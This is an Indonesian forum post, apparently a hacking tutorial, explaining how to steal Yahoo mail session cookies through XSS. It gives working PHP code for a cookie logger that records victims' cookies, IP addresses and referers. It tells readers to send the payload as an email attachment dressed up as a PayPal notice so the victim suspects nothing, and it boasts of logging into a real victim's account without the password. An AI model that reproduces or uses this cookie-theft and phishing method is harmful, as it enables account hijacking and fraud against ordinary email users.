Seperti yang telah kita ketahui .. XSS merupakan salah sebuah jenis serangan yang paling berbahaya dalam dunia
berinternet dan hacking .. Akan tetapi, percayakah anda bahwa jenis serangan inipun kerapkali menyerang berbagai
perusahaan raksasa seperti hotmail bahkan yahoo?? Dalam video ini kita akan sedikit bahas mengenai yahoo yang
terkena jenis serangan sejenis ini ..
Tidak percaya?! Mari kita buktikan
Selain itu andapun memerlukan file *.php yang berisikan script ini:
<?php
$cookie = $_GET['id'];
$cook = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, '<br> idu lu ala: ' .$cookie. 'Cookie: '.$cook.'<br> IP: ' .$ip. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
Jangan lupa juga untuk menghostingkannya dalam hosting yang bisa accpet PHP..
Selain itu juga jgn lupa untuk membuat file cookies.txt dalam directory yang sama dengan script ini ..
Setelah memiliki script .php tadi dan setelah menghostingkannya dalam hosting server yang layak ..
Sekarang yang kita perlukan adalah mengirimkan scirpt pertama secara attachment ke email korban ..
Untuk membuat korban tidak curiga .. Ada baiknya script tersebut disisipkan dalam HTML code lain
Now .. WHen ur victim membuka email mereka dengan menggunakan Internet Explorer ..
Mereka akan mendapatkan email tersebut hanya sebagai notifikasi letters dari Paypal ..
Berikut contohnya
OWNED!!!!
Hahaha
U've got the Cookies !!!
Nice, huh?!
Berikut adalah contoh yang akan saya lakukan menggunakan account orang philliphine yang kena tipu muslihat paypal xD
woops!!
My bad ..
My victim changed his Pass already
Logged in after logout .. And its WITHOUT PASSWORD !!!
Hehehehe
OWNED !!!
Well .. Mohon maaf karena tadi contoh yang saya berikan sudah mengganti password nya ..
I've got some more .. Tapi gak isa dipercobakan 1 per 1
Yay!!!
Hhahaha
Sekian~
Credit : Th0R (salam kangen buat ausy broo kangen nih jadi inget IF)
(kalo ga cocok di del aja mbah)
